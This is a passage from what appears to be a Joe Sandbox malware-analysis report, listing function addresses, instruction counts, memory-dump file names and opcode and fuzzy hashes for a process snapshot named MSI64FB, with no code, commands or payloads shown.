                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c21c31f2fc2676bda15469c0d822a7cb30643392ec22c1bd56d11ecf36906c54
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DC18E66A0C686C5EBA0FE6198107BAE6B0FF85788F904032DE8DA76D5DF3CE5458710
                                                                                                                                                                                                                                                    Function 00007FF749F83BF4 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6574901448fe34b7f0063453580bb2776d5691e1a68a0989abf8afa9a92b9c6f
                                                                                                                                                                                                                                                    • Instruction ID: a1fbcfc9cad03658233aee0dc0c97a7f5ed985535325ff2454f627fcb7d37de4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6574901448fe34b7f0063453580bb2776d5691e1a68a0989abf8afa9a92b9c6f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90A12623B1C646C6EFA8FE2594103B9E6B0AF41784F852538DD1DA77E4DFBCE4099620
                                                                                                                                                                                                                                                    Function 00007FF749F97600 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 066fa6dc129c8db66a9903168c5049cfb0b6bcabbabeaf70dbf2bf925b3ad596
                                                                                                                                                                                                                                                    • Instruction ID: d7c2a645242f0233b5bf4423cc3afa48c80b65b5b137bd9ef61b1b6b15fc7385
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066fa6dc129c8db66a9903168c5049cfb0b6bcabbabeaf70dbf2bf925b3ad596
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B1AF22A1CB46C6EB64FF21C4116B9A3B4FB86B88F944231DA19936C9DF3CE551C750
                                                                                                                                                                                                                                                    Function 00007FF749F5AB4C Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b369e4d611f2271c025e8e30fe8b4fc1618eb6d88e416f33be8816871b34b968
                                                                                                                                                                                                                                                    • Instruction ID: e162665fda8c6a159a8cb9b6abc42718cfde08eda35d7a4c4bc904b0d0cb4274
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b369e4d611f2271c025e8e30fe8b4fc1618eb6d88e416f33be8816871b34b968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2191CE22B1EA96D9FB10BF69C4501BCA7B1AB44B98B954031DE0E07BD5EF28D991C320
                                                                                                                                                                                                                                                    Function 00007FF749F535E0 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 88e455fc7aa2f2adea69b99f321d66fecc83aba96c81983c2a0c0dd5cfcf6da5
                                                                                                                                                                                                                                                    • Instruction ID: d5ddc76d78f951f711d10ed4fa1dfe612a76f81a989a4f12dea66c7722e4e71b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88e455fc7aa2f2adea69b99f321d66fecc83aba96c81983c2a0c0dd5cfcf6da5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C191F022F0C681E9FB05BF6994502BCABB1AB01BA8FA64035CE5E177D6DE68D545C320
                                                                                                                                                                                                                                                    Function 00007FF749F92410 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c33a6b7ba7b80a4c5a3a224c0fb15113dbbc5669709bd21f1056c5f9813a480a
                                                                                                                                                                                                                                                    • Instruction ID: 03bd2c467624a531bf50bff0cc9f7914b4ee1817718e1ebef62f48ce047cf3f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c33a6b7ba7b80a4c5a3a224c0fb15113dbbc5669709bd21f1056c5f9813a480a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4191D222D1CF85C4E766BE68A4403BBE271BF86750F649331DE6D265E5DF3CA0818610
                                                                                                                                                                                                                                                    Function 00007FF749F8A464 Relevance: .2, Instructions: 207COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    • Opcode ID: 794c11211927649d932b3691f66082c283c136d74ade2bf0228d4f4f8ac29e23
                                                                                                                                                                                                                                                    • Instruction ID: 5dfaf537d37b3e79312087d53c1e6e31aafd77eea2e49ea3bbe83626e3b40cd1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 794c11211927649d932b3691f66082c283c136d74ade2bf0228d4f4f8ac29e23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11818F72A08A11C6EBA0FE25D49537DA370FB84BA8F944636EE1E977D9DF38D0518310
                                                                                                                                                                                                                                                    Function 00007FF749F8F948 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ff972ccb01192226430f2d174c616ee17f645c7a14bb65346abcb5110e159519
                                                                                                                                                                                                                                                    • Instruction ID: 50d6065fa6094f59e7e341bfbaeabc10fc00cabfca64229e62696a82e4cc485f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff972ccb01192226430f2d174c616ee17f645c7a14bb65346abcb5110e159519
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C281F472A4C781CAE7A4EF19948437AEAA0FB857A4F904235DA9D53BC9DF3CD5008B50
                                                                                                                                                                                                                                                    Function 00007FF749F7FD1C Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 13b0105106c40ed4eba3e74a7f849f42d06bf884942e094675a3d9d0a39c6c1d
                                                                                                                                                                                                                                                    • Instruction ID: 6f672977382deaaa0fbc8722f328609ebb7c811c840aa733d434750205da6b30
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13b0105106c40ed4eba3e74a7f849f42d06bf884942e094675a3d9d0a39c6c1d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A351A232A5CA51C6E724AF29C050278B3B0EB49B68FA44171EE8D077D5CF3AE843C760
                                                                                                                                                                                                                                                    Function 00007FF749F7F4FC Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 89c7a4a40dae9ae74dfa0c7d26b586ba0f48d79d37668169046dc22e6404ff41
                                                                                                                                                                                                                                                    • Instruction ID: 2aac21fd808114957311d0978547b935f6a2e4620dbafcebeda1784cb15fa00a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89c7a4a40dae9ae74dfa0c7d26b586ba0f48d79d37668169046dc22e6404ff41
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40518176A5C651C6E724AF29C054238B7B1EB48B6CFA48171EE4D177E4CB3AE843C760
                                                                                                                                                                                                                                                    Function 00007FF749F7F90C Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 958af43b5455bf2407519b3ecd724e91f302b1c621c373eda0090ceb08c00e34
                                                                                                                                                                                                                                                    • Instruction ID: 28892ccfc50cb449153a08de45562bd8af57b26b78073fb71f739bc50a4abf65
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 958af43b5455bf2407519b3ecd724e91f302b1c621c373eda0090ceb08c00e34
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1518336A6CA51C6E724AF29C450238B3B0EB48B68F648171EE4D177D5CB3AEC53C750
                                                                                                                                                                                                                                                    Function 00007FF749F7FB18 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b6ae896f4f730ecb132dcea19f42c89ba9b02889226b951f8076e892e6296241
                                                                                                                                                                                                                                                    • Instruction ID: 358f16d29d8e2efbd38dfb3445678240bf58a21423d506ed8115466442e903db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ae896f4f730ecb132dcea19f42c89ba9b02889226b951f8076e892e6296241
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451B132A5C652C6E764AF2DC050238B7B1EB48B58FA44171EE4C077E4CB3AE943C760
                                                                                                                                                                                                                                                    Function 00007FF749F7F2F8 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6b9cd13e66553fd8c4517fa76dc8a4af09b0066961e128d371c74e405cdbe00d
                                                                                                                                                                                                                                                    • Instruction ID: d8ed084c6a60ae3d947aa64ad6ce35cfb9c6214ad9d0ff60e567b834d565e8e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b9cd13e66553fd8c4517fa76dc8a4af09b0066961e128d371c74e405cdbe00d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2519F32A6C651C6E764AF29C044238B7B0EB49B58FA84171EE4D177E4CB3AEC42C760
                                                                                                                                                                                                                                                    Function 00007FF749F7F708 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e081bc5d7bfd2ee68d489027360a41bc3b7ef8b2fb9564c51f1fe64475db137d
                                                                                                                                                                                                                                                    • Instruction ID: 5b0b545c114e3ff73cd01510325725535370ea9a49d7a9f8db4a4fabf3f06737
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e081bc5d7bfd2ee68d489027360a41bc3b7ef8b2fb9564c51f1fe64475db137d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51A036A6C651C6E764AF29C140238B7B0EB48B58FA84171EE4D177E4CB3AEC53C790
                                                                                                                                                                                                                                                    Function 00007FF749F8C514 Relevance: .1, Instructions: 125COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c354f88c1c44c2ece779ca759ea73176f561d08044f83dab54d900259ffb089
                                                                                                                                                                                                                                                    • Instruction ID: 61b11fa3e67249b50176e07ef2f67bb30803ac3f969353088283038b504356f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c354f88c1c44c2ece779ca759ea73176f561d08044f83dab54d900259ffb089
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1141C462718A5582EF44EF6AD91517AE3B1BB48FD4B89A032EE1D97B94EF3CD4418300
                                                                                                                                                                                                                                                    Function 00007FF749F9CB40 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5b5d3277f4911141179525d391ca3b68cfba31e13b1b04252a50c7f0ab254f01
